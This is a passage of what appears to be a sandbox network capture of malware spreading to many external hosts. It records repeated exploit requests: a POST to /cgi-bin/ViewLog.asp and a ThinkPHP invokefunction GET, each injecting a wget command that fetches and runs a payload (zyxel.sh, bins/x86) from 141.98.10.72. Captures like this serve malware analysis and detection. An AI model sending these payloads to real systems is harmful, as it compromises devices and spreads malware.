Feb 14, 2024 09:29:38.585901022 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.393364906 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:51.543768883 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
155	192.168.2.15	50692	94.64.193.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.518601894 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.768032074 CET	411	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 10:26:52 GMT Server: Webs X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
156	192.168.2.15	55198	62.29.28.251	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.519134045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:15.802700996 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:17.306524992 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:20.410425901 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:26.554289103 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:38.585901976 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.441131115 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.591969013 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
157	192.168.2.15	46872	94.122.202.255	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.521881104 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
158	192.168.2.15	33368	94.187.106.193	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:14.528695107 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
159	192.168.2.15	40624	95.100.185.37	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:15.215315104 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:15.410032988 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:15 GMT Date: Wed, 14 Feb 2024 08:29:15 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 36 33 65 32 32 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 35 35 26 23 34 36 3b 35 39 30 32 32 66 39 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.163e2217.1707899355.59022f9c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
160	192.168.2.15	33430	95.216.173.124	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:15.246798038 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:15.474242926 CET	355	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 14 Feb 2024 08:29:15 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
161	192.168.2.15	59496	95.56.209.43	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:15.309796095 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:15.599000931 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:29:15.599970102 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
162	192.168.2.15	40722	88.198.147.174	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:15.463004112 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:15.671544075 CET	219	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
163	192.168.2.15	40640	95.100.185.37	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:15.504414082 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:15.699265957 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:15 GMT Date: Wed, 14 Feb 2024 08:29:15 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 36 33 65 32 32 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 35 35 26 23 34 36 3b 35 39 30 32 33 31 31 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.163e2217.1707899355.59023112</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
164	192.168.2.15	34948	88.147.5.63	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:15.554778099 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:15.790668011 CET	504	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 14 Feb 2024 08:29:15 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 Location: https:///freepbx/error.html Content-Length: 235 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 2f 66 72 65 65 70 62 78 2f 65 72 72 6f 72 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https:///freepbx/error.html">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
165	192.168.2.15	40732	88.198.147.174	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:15.883210897 CET	219	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
166	192.168.2.15	40186	62.29.90.41	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:16.059923887 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
167	192.168.2.15	50564	94.121.217.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:16.060025930 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
168	192.168.2.15	38034	94.122.107.135	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:16.060131073 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
169	192.168.2.15	59488	85.9.99.138	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:16.082761049 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:16.370795012 CET	113	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:29:16 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
170	192.168.2.15	56092	85.31.233.59	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:16.449037075 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
171	192.168.2.15	46110	94.130.127.137	8080

Timestamp	Bytes transferred	Direction	Data
